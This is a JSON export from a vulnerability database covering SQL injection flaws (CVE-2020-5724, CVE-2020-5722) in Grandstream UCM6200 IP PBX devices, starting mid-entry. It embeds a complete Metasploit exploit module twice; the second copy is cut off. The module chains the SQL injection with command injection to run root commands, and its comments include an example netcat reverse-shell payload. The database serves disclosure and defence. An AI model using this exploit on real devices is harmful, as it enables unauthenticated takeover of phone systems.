"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2020-003469",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2020-5724",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2020-003469",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2020-20680",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202003-1714",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2020-5724",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-20680"
},
{
"db": "VULMON",
"id": "CVE-2020-5724"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003469"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1714"
},
{
"db": "NVD",
"id": "CVE-2020-5724"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Grandstream UCM6200 series before 1.0.20.22 is vulnerable to an SQL injection via the HTTP server\u0027s websockify endpoint. A remote unauthenticated attacker can invoke the challenge action with a crafted username and discover user passwords. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream. The vulnerability stems from the lack of verification of external input SQL statements by database-based applications. Attackers can use this vulnerability to execute illegal SQL commands",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-5724"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003469"
},
{
"db": "CNVD",
"id": "CNVD-2020-20680"
},
{
"db": "VULMON",
"id": "CVE-2020-5724"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-5724",
"trust": 3.1
},
{
"db": "TENABLE",
"id": "TRA-2020-17",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003469",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-20680",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1714",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2020-5724",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-20680"
},
{
"db": "VULMON",
"id": "CVE-2020-5724"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003469"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1714"
},
{
"db": "NVD",
"id": "CVE-2020-5724"
}
]
},
"id": "VAR-202003-1437",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-20680"
}
],
"trust": 1.45714287
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-20680"
}
]
},
"last_update_date": "2024-02-13T22:30:30.301000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.grandstream.com/"
},
{
"title": "Patch for Grandstream UCM6200 SQL injection vulnerability (CNVD-2020-20680)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/211859"
},
{
"title": "Grandstream UCM6200 SQL Repair measures for injecting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=113109"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-20680"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003469"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1714"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-89",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003469"
},
{
"db": "NVD",
"id": "CVE-2020-5724"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.tenable.com/security/research/tra-2020-17"
},
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-5724"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-5724"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/89.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.rapid7.com/db/modules/auxiliary/gather/grandstream_ucm62xx_sql_account_guess/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-20680"
},
{
"db": "VULMON",
"id": "CVE-2020-5724"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003469"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1714"
},
{
"db": "NVD",
"id": "CVE-2020-5724"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-20680"
},
{
"db": "VULMON",
"id": "CVE-2020-5724"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003469"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1714"
},
{
"db": "NVD",
"id": "CVE-2020-5724"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-03-31T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-20680"
},
{
"date": "2020-03-30T00:00:00",
"db": "VULMON",
"id": "CVE-2020-5724"
},
{
"date": "2020-04-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-003469"
},
{
"date": "2020-03-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-1714"
},
{
"date": "2020-03-30T20:15:20.087000",
"db": "NVD",
"id": "CVE-2020-5724"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-05-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-20680"
},
{
"date": "2020-03-30T00:00:00",
"db": "VULMON",
"id": "CVE-2020-5724"
},
{
"date": "2020-04-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-003469"
},
{
"date": "2020-04-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-1714"
},
{
"date": "2020-03-30T21:49:40.620000",
"db": "NVD",
"id": "CVE-2020-5724"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-1714"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Grandstream UCM6200 In the series SQL Injection vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003469"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-1714"
}
],
"trust": 0.6
}
}
VAR-202003-1435
Vulnerability from variot - Updated: 2024-01-18 22:55The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. An attacker can use this vulnerability to execute shell commands as root on versions before 1.0.19.20 or inject HTML in password recovery emails in versions before 1.0.20.17. Grandstream UCM6200 In the series SQL An injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream.
Grandstream UCM6200 versions prior to 1.0.19.20 and versions before 1.0.20.17 have SQL injection vulnerabilities. ##
This module requires Metasploit: https://metasploit.com/download
Current source: https://github.com/rapid7/metasploit-framework
class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking
prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager
def initialize(info = {}) super( update_info( info, 'Name' => 'Grandstream UCM62xx IP PBX sendPasswordEmail RCE', 'Description' => %q{ This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and a command injection vulnerability (technically, no assigned CVE but was inadvertently patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX series of devices.
Exploitation happens in two stages:
1. An SQL injection during username lookup while executing the "Forgot Password" function.
2. A command injection that occurs after the user provided username is passed to a Python script
via the shell. Like so:
/bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \
password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `
This module affect UCM62xx versions before firmware version 1.0.19.20.
},
'License' => MSF_LICENSE,
'Author' => [
'jbaines-r7' # Vulnerability discovery, original exploit, and Metasploit module
],
'References' => [
[ 'CVE', '2020-5722' ],
[ 'EDB', '48247']
],
'DisclosureDate' => '2020-03-23',
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD, ARCH_ARMLE],
'Privileged' => true,
'Targets' => [
[
'Unix Command',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'Payload' => {
'DisableNops' => true,
'BadChars' => '\'&|'
},
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
}
}
],
[
'Linux Dropper',
{
'Platform' => 'linux',
'Arch' => [ARCH_ARMLE],
'Type' => :linux_dropper,
'CmdStagerFlavor' => [ 'wget' ]
}
]
],
'DefaultTarget' => 1,
'DefaultOptions' => {
'RPORT' => 8089,
'SSL' => true
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK ]
}
)
)
register_options([
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
end
## # Sends a POST /cgi request with a payload of action=getInfo. The # server should respond with a large json blob like the following, # where "prog_version" is he firmware version: # # {"response"=>{ # "model_name"=>"UCM6202", "description"=>"IPPBX Appliance", # "device_name"=>"", "logo"=>"images/h_logo.png", "logo_url"=>"http://www.grandstream.com/", # "copyright"=>"Copyright \u00A9 Grandstream Networks, Inc. 2014. All Rights Reserved.", # "num_fxo"=>"2", "num_fxs"=>"2", "num_pri"=>"0", "num_eth"=>"2", "allow_nat"=>"1", # "svip_type"=>"4", "net_mode"=>"0", "prog_version"=>"1.0.18.13", "country"=>"US", # "support_openvpn"=>"1", "enable_openvpn"=>"0", "enable_webrtc_openvpn"=>"0", # "support_webrtc_cloud"=>"0"}, "status"=>0} ### def check normalized_uri = normalize_uri(target_uri.path, '/cgi') vprint_status("Requesting version information from #{normalized_uri}") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalized_uri, 'vars_post' => { 'action' => 'getInfo' } })
return CheckCode::Unknown('HTTP status code is not 200') unless res&.code == 200
body_json = res.get_json_document
return CheckCode::Unknown('No JSON in response') unless body_json
prog_version = body_json.dig('response', 'prog_version')
return false if prog_version.nil?
vprint_status("The reported version is: #{prog_version}")
version = Rex::Version.new(prog_version)
if version < Rex::Version.new('1.0.19.20')
return CheckCode::Appears("This determination is based on the version string: #{prog_version}.")
end
return CheckCode::Safe("This determination is based on the version string: #{prog_version}.")
end
##
# Throws a payload at the sendPasswordEmail action. The payload must first survive an SQL injection
# and then it will get passed to a python script via sh which allows us to execute a command injection.
# It will look something like this:
#
# /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \
# password '' cat <<'TTsf7G0' z' or 1=1--;nc 10.0.0.3 4444 -e /bin/sh;TTsf7G0
#
# This functionality is related to the"Forgot Password" feature. This function is rate limited by
# the server so that an attacker can only invoke it, at most, every 60 seconds. As such, only a few
# payloads are appropriate.
###
def execute_command(cmd, _opts = {})
rand_num = Rex::Text.rand_text_numeric(1..5)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/cgi'),
'vars_post' =>
{
'action' => 'sendPasswordEmail',
'user_name' => "' or #{rand_num}=#{rand_num}--;#{cmd};"
}
}, 5)
# the netcat reverse shell payload holds the connection open. So we'll treat no response
# as a success. The meterpreter payload does not hold the connection open so this clause digs
# deeper to ensure it succeeded. The server will respond with a non-0 status if the payload
# generates an error (e.g. rate limit error)
if res
fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res.code == 200
body_json = res.get_json_document
fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json
status_json = body_json['status']
fail_with(Failure::UnexpectedReply, 'The JSON response is missing the status element') unless status_json
fail_with(Failure::UnexpectedReply, "The server responded with an error status #{status_json}") unless status_json == 0
end
print_good('Exploit successfully executed.')
end
def exploit print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") case target['Type'] when :unix_cmd execute_command(payload.encoded) when :linux_dropper execute_cmdstager end end end
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202003-1435",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ucm6200",
"scope": "lt",
"trust": 1.6,
"vendor": "grandstream",
"version": "1.0.19.20"
},
{
"model": "ucm6200",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "1.0.19.20"
},
{
"model": "ucm6200",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "1.0.20.17"
},
{
"model": "ucm6200",
"scope": "lt",
"trust": 0.6,
"vendor": "grandstream",
"version": "1.0.20.17"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-23201"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003190"
},
{
"db": "NVD",
"id": "CVE-2020-5722"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:ucm6200_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.0.19.20",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:ucm6200:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-5722"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Jacob Baines",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-1337"
}
],
"trust": 0.6
},
"cve": "CVE-2020-5722",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "JVNDB-2020-003190",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2020-23201",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULMON",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2020-5722",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "HIGH",
"trust": 0.1,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2020-003190",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2020-5722",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "JVNDB-2020-003190",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2020-23201",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202003-1337",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULMON",
"id": "CVE-2020-5722",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-23201"
},
{
"db": "VULMON",
"id": "CVE-2020-5722"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003190"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1337"
},
{
"db": "NVD",
"id": "CVE-2020-5722"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. An attacker can use this vulnerability to execute shell commands as root on versions before 1.0.19.20 or inject HTML in password recovery emails in versions before 1.0.20.17. Grandstream UCM6200 In the series SQL An injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream. \n\r\n\r\nGrandstream UCM6200 versions prior to 1.0.19.20 and versions before 1.0.20.17 have SQL injection vulnerabilities. ##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule \u003c Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n \u0027Name\u0027 =\u003e \u0027Grandstream UCM62xx IP PBX sendPasswordEmail RCE\u0027,\n \u0027Description\u0027 =\u003e %q{\n This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and\n a command injection vulnerability (technically, no assigned CVE but was inadvertently\n patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX\n series of devices. \n\n Exploitation happens in two stages:\n\n 1. An SQL injection during username lookup while executing the \"Forgot Password\" function. \n 2. A command injection that occurs after the user provided username is passed to a Python script\n via the shell. Like so:\n\n /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \\\n password \u0027\u0027 `cat \u003c\u003c\u0027TTsf7G0\u0027 z\u0027 or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `\n\n This module affect UCM62xx versions before firmware version 1.0.19.20. \n },\n \u0027License\u0027 =\u003e MSF_LICENSE,\n \u0027Author\u0027 =\u003e [\n \u0027jbaines-r7\u0027 # Vulnerability discovery, original exploit, and Metasploit module\n ],\n \u0027References\u0027 =\u003e [\n [ \u0027CVE\u0027, \u00272020-5722\u0027 ],\n [ \u0027EDB\u0027, \u002748247\u0027]\n ],\n \u0027DisclosureDate\u0027 =\u003e \u00272020-03-23\u0027,\n \u0027Platform\u0027 =\u003e [\u0027unix\u0027, \u0027linux\u0027],\n \u0027Arch\u0027 =\u003e [ARCH_CMD, ARCH_ARMLE],\n \u0027Privileged\u0027 =\u003e true,\n \u0027Targets\u0027 =\u003e [\n [\n \u0027Unix Command\u0027,\n {\n \u0027Platform\u0027 =\u003e \u0027unix\u0027,\n \u0027Arch\u0027 =\u003e ARCH_CMD,\n \u0027Type\u0027 =\u003e :unix_cmd,\n \u0027Payload\u0027 =\u003e {\n \u0027DisableNops\u0027 =\u003e true,\n \u0027BadChars\u0027 =\u003e \u0027\\\u0027\u0026|\u0027\n },\n \u0027DefaultOptions\u0027 =\u003e {\n \u0027PAYLOAD\u0027 =\u003e \u0027cmd/unix/reverse_netcat_gaping\u0027\n }\n }\n ],\n [\n \u0027Linux Dropper\u0027,\n {\n \u0027Platform\u0027 =\u003e \u0027linux\u0027,\n \u0027Arch\u0027 =\u003e [ARCH_ARMLE],\n \u0027Type\u0027 =\u003e :linux_dropper,\n \u0027CmdStagerFlavor\u0027 =\u003e [ \u0027wget\u0027 ]\n }\n ]\n ],\n \u0027DefaultTarget\u0027 =\u003e 1,\n \u0027DefaultOptions\u0027 =\u003e {\n \u0027RPORT\u0027 =\u003e 8089,\n \u0027SSL\u0027 =\u003e true\n },\n \u0027Notes\u0027 =\u003e {\n \u0027Stability\u0027 =\u003e [CRASH_SAFE],\n \u0027Reliability\u0027 =\u003e [REPEATABLE_SESSION],\n \u0027SideEffects\u0027 =\u003e [IOC_IN_LOGS, ARTIFACTS_ON_DISK ]\n }\n )\n )\n register_options([\n OptString.new(\u0027TARGETURI\u0027, [true, \u0027Base path\u0027, \u0027/\u0027])\n ])\n end\n\n ##\n # Sends a POST /cgi request with a payload of action=getInfo. The\n # server should respond with a large json blob like the following,\n # where \"prog_version\" is he firmware version:\n #\n # {\"response\"=\u003e{\n # \"model_name\"=\u003e\"UCM6202\", \"description\"=\u003e\"IPPBX Appliance\",\n # \"device_name\"=\u003e\"\", \"logo\"=\u003e\"images/h_logo.png\", \"logo_url\"=\u003e\"http://www.grandstream.com/\",\n # \"copyright\"=\u003e\"Copyright \\u00A9 Grandstream Networks, Inc. 2014. All Rights Reserved.\",\n # \"num_fxo\"=\u003e\"2\", \"num_fxs\"=\u003e\"2\", \"num_pri\"=\u003e\"0\", \"num_eth\"=\u003e\"2\", \"allow_nat\"=\u003e\"1\",\n # \"svip_type\"=\u003e\"4\", \"net_mode\"=\u003e\"0\", \"prog_version\"=\u003e\"1.0.18.13\", \"country\"=\u003e\"US\",\n # \"support_openvpn\"=\u003e\"1\", \"enable_openvpn\"=\u003e\"0\", \"enable_webrtc_openvpn\"=\u003e\"0\",\n # \"support_webrtc_cloud\"=\u003e\"0\"}, \"status\"=\u003e0}\n ###\n def check\n normalized_uri = normalize_uri(target_uri.path, \u0027/cgi\u0027)\n vprint_status(\"Requesting version information from #{normalized_uri}\")\n res = send_request_cgi({\n \u0027method\u0027 =\u003e \u0027POST\u0027,\n \u0027uri\u0027 =\u003e normalized_uri,\n \u0027vars_post\u0027 =\u003e { \u0027action\u0027 =\u003e \u0027getInfo\u0027 }\n })\n\n return CheckCode::Unknown(\u0027HTTP status code is not 200\u0027) unless res\u0026.code == 200\n\n body_json = res.get_json_document\n return CheckCode::Unknown(\u0027No JSON in response\u0027) unless body_json\n\n prog_version = body_json.dig(\u0027response\u0027, \u0027prog_version\u0027)\n return false if prog_version.nil?\n\n vprint_status(\"The reported version is: #{prog_version}\")\n\n version = Rex::Version.new(prog_version)\n if version \u003c Rex::Version.new(\u00271.0.19.20\u0027)\n return CheckCode::Appears(\"This determination is based on the version string: #{prog_version}.\")\n end\n\n return CheckCode::Safe(\"This determination is based on the version string: #{prog_version}.\")\n end\n\n ##\n # Throws a payload at the sendPasswordEmail action. The payload must first survive an SQL injection\n # and then it will get passed to a python script via sh which allows us to execute a command injection. \n # It will look something like 